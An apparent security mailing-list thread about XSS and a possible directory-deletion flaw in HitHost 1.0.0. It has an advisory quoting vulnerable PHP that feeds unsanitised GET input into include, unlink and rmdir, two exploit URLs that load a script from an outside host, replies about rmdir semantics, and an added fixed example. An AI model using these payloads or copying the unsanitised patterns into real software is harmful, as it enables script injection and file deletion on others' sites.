Re: histhost v1.0.0 xss and possible rmdir
and my manpages for rmdir(1) [the utility] and rmdir(2) [the system call] both say that the directory must be empty (i.e., have no entries other than "." or ".."). rmdir(2) should fail and errno should be set to ENOTEMPTY if the directory is not empty.

On 3/14/06, Steven M. Christey <[EMAIL PROTECTED]> wrote:
>
> retard said:
>
> >as you see line 19 raises suspicion of the possibility of rming 0777
> >dirs i've tried it on my personal server with no success, if someone
> >knows of a way let me know.
>
> According to the PHP manual, rmdir only works on empty directories.
> Did you try to remove an empty directory?
>
> - Steve
>

--
GDB has a 'break' feature; why doesn't it have 'fix' too?

Re: histhost v1.0.0 xss and possible rmdir
retard said:

>as you see line 19 raises suspicion of the possibility of rming 0777
>dirs i've tried it on my personal server with no success, if someone
>knows of a way let me know.

According to the PHP manual, rmdir only works on empty directories.
Did you try to remove an empty directory?

- Steve

histhost v1.0.0 xss and possible rmdir
summary

software: HitHost
vendor's website: http://daverave.64digits.com/index.php?page=hithost
versions: <= 1.0.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium

description

hithost uses $_GET variables in crucial parts of their code causing xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded to 0777

in ./admin/deleteuser.php:

    15 else
    16 {
    17 unlink("users/$deleteuser/password.php");
    18 unlink("users/$deleteuser/counter.php");
    19 rmdir("users/$deleteuser/");
    20 echo "The user $deleteuser has been deleted";
    21 }

as you see line 19 raises suspicion of the possibility of rming 0777 dirs i've tried it on my personal server with no success, if someone knows of a way let me know.

in ./admin/viewuser.php:

    6 $viewuser = $_GET['user'];
    7 include("users/$viewuser/counter.php");
    8 echo "Username: $viewuser";
    9 echo "Number of counter hits: $hits";

this code is self explanatory, the script does not sanitise the $_GET['user'] allowing users to easily shove xss into the variable.

exploit(s)

http://example.com/admin/deleteuser.php?user=http://notlegal.ws/xss.js>
http://example.com/admin/viewuser.php?hits=http://notlegal.ws/xss.js>

credit

author(s): retard
email: [EMAIL PROTECTED]
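
Added example (not part of the original advisory and not HitHost code): one way the two listings above could check the user parameter before it reaches unlink/rmdir/include, and encode it when it is echoed. The function names, the allowlist pattern and the assumption that counter.php sets $hits are hypothetical; the demo data is constructed.

```php
<?php
// Added example, not HitHost code. Assumed: user names match [A-Za-z0-9_-]{1,32}
// and counter.php sets $hits (inferred from the viewuser.php listing).

function valid_username(string $name): bool
{
    // Allowlist check: "/", "..", "<", quotes and NUL bytes all fail it.
    return preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name) === 1;
}

function view_user(string $base, string $raw): string
{
    if (!valid_username($raw) || !is_file("$base/$raw/counter.php")) {
        return 'Unknown user';          // never echo the rejected value back
    }
    $hits = 0;
    include "$base/$raw/counter.php";   // path now built from a checked name
    $name = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8'); // encode on output too
    return "Username: $name<br>Number of counter hits: " . (int) $hits;
}

function delete_user(string $base, string $raw): bool
{
    if (!valid_username($raw) || !is_dir("$base/$raw")) {
        return false;
    }
    @unlink("$base/$raw/password.php");
    @unlink("$base/$raw/counter.php");
    return @rmdir("$base/$raw");        // false if anything else is still inside
}

// Constructed demo data in a throwaway directory.
$base = sys_get_temp_dir() . '/hithost_demo_' . uniqid();
foreach (['alice', 'bob'] as $u) {
    mkdir("$base/$u", 0700, true);
    file_put_contents("$base/$u/counter.php", '<?php $hits = 7;');
    file_put_contents("$base/$u/password.php", '<?php // placeholder');
}
file_put_contents("$base/bob/extra.txt", 'x');    // makes bob's dir non-empty

echo view_user($base, 'alice'), "\n";             // normal lookup
echo view_user($base, '<b>x</b>'), "\n";          // markup fails the allowlist
echo view_user($base, '../alice'), "\n";          // path separators fail it too
var_dump(delete_user($base, 'alice'));            // directory was emptied first
var_dump(delete_user($base, 'bob'));              // rmdir refuses: extra.txt remains
var_dump(delete_user($base, '..'));               // never reaches unlink/rmdir
```

The bob case shows the behaviour discussed in the replies: rmdir only removes a directory once nothing but "." and ".." is left in it.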